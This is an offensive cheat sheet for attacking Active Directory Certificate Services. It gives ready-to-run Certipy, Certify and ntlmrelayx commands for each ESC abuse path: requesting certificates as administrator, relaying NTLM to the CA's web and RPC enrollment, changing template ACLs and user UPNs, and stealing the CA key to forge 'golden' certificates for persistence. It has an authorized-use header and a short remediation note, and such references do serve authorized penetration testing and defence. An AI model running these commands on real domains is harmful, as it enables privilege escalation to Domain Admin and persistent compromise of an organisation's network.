← All cheat sheets

ADCS-ATTACKS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Active Directory Certificate Services (ADCS) misconfigurations enable
privilege escalation and domain persistence. The "ESC" taxonomy
(SpecterOps) catalogs the abuse paths. Primary tooling: Certipy
(Linux) and Certify/PSPKIAudit (Windows). Authorized testing only.

ENUMERATION - CERTIPY#

certipy find -u user@corp.lu -p pass -dc-ip <dc>
certipy find -u user@corp.lu -p pass -dc-ip <dc> -vulnerable
                                     # Only flag exploitable templates
certipy find -u user@corp.lu -p pass -dc-ip <dc> -stdout
certipy find ... -old-bloodhound     # BloodHound-importable output
# Reports CA hosts, templates, enrollment rights, EKUs, flags

ENUMERATION - CERTIFY (WINDOWS)#

Certify.exe find                     # All templates + CAs
Certify.exe find /vulnerable         # Vulnerable templates
Certify.exe find /enrolleeSuppliesSubject   # ESC1 candidates

ESC1 - SUPPLY SAN#

# Template: enrollee supplies subject + client auth EKU + low-priv enroll
certipy req -u user@corp.lu -p pass -dc-ip <dc> -ca <CA-NAME> \
  -template <VulnTemplate> -upn administrator@corp.lu
# -> get a cert as any user (e.g. Domain Admin), then auth:
certipy auth -pfx administrator.pfx -dc-ip <dc>

ESC2 - ANY PURPOSE EKU#

# Template has Any Purpose or no EKU -> usable for auth
certipy req ... -template <VulnTemplate> -upn administrator@corp.lu

ESC3 - ENROLLMENT AGENT#

# Certificate Request Agent EKU -> enroll on behalf of others
certipy req ... -template <AgentTemplate>            # get agent cert
certipy req ... -template User -on-behalf-of 'CORP\administrator' \
  -pfx agent.pfx

ESC4 - TEMPLATE ACL ABUSE#

# You have write over a template -> make it ESC1, exploit, revert
certipy template -u user@corp.lu -p pass -template <T> \
  -save-old -write-default-configuration    # (older syntax varies)

ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2#

# CA flag lets any request specify a SAN (pre-May 2022 patch)
certipy req ... -template User -upn administrator@corp.lu

ESC7 - CA ACCESS RIGHTS#

# ManageCA / ManageCertificates rights on the CA itself
certipy ca -u u -p p -ca <CA> -add-officer <user>    # ESC7 -> ESC7
# Enable a template, approve requests, or flip EDITF flags

ESC8 - HTTP ENROLLMENT RELAY#

# Web enrollment (certsrv) without EPA -> NTLM relay
impacket-ntlmrelayx -t http://<ca>/certsrv/certfnsh.asp --adcs \
  --template DomainController -smb2support
# (coerce DC auth via PetitPotam - see NTLM-RELAY.txt)

ESC9 / ESC10 - NO SECURITY EXTENSION / WEAK MAPPING#

# Certificate mapping weaknesses (szOID / UPN manipulation)
# Requires GenericWrite over a victim to alter UPN, then enroll
certipy account -u u -p p -user <victim> -upn administrator update
certipy req ... -template <T>                        # then revert UPN

ESC11 - RPC ENROLLMENT RELAY (IF_ENFORCEENCRYPTICERTREQUEST)#

# Relay to the CA RPC (ICertPassage) endpoint when unencrypted
impacket-ntlmrelayx -t rpc://<ca> -rpc-mode ICPR \
  -icpr-ca-name <CA> --adcs --template User
# Template linked to an issuance policy mapped to a privileged group
certipy req ... -template <T>          # cert grants group membership

ESC14/15/16 - MAPPING & EXTENSION ABUSE#

# ESC15 (CVE-2024-49019): "EKUwu" - v1 templates + app policies
certipy req ... -template WebServer -upn administrator@corp.lu \
  -application-policies 'Client Authentication'
# ESC16: security-extension-disabled scenarios / mapping abuse

PERSISTENCE#

# Steal CA private key -> forge certs for any principal (Golden Cert):
certipy ca -backup -ca <CA> -u u -p p        # if you have DA/CA admin
certipy forge -ca-pfx ca.pfx -upn administrator@corp.lu
# Certificates survive password resets - long-lived persistence

EXAMPLES#

# One-shot vulnerability discovery
certipy find -u user@corp.lu -p 'Pass' -dc-ip 10.0.0.1 -vulnerable -stdout

# ESC1 to Domain Admin
certipy req -u user@corp.lu -p 'Pass' -dc-ip 10.0.0.1 -ca CORP-CA \
  -template VulnTemplate -upn administrator@corp.lu
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
# -> yields NT hash + TGT for administrator

NOTES#

- Run 'certipy find -vulnerable' first; it auto-classifies ESC1-ESC16
- Certificates are password-reset resistant = strong persistence;
  in IR you must revoke certs / rotate the CA key, not just reset pw
- ESC8/ESC11 combine with coercion (NTLM-RELAY.txt) for DA from
  low priv without cracking anything
- The May 2022 KB5014754 patch changed cert mapping (strong mapping)
  and drives ESC9/ESC10/ESC16 scenarios
- Map remediation to DORA ICT risk mgmt + PKI governance for FS clients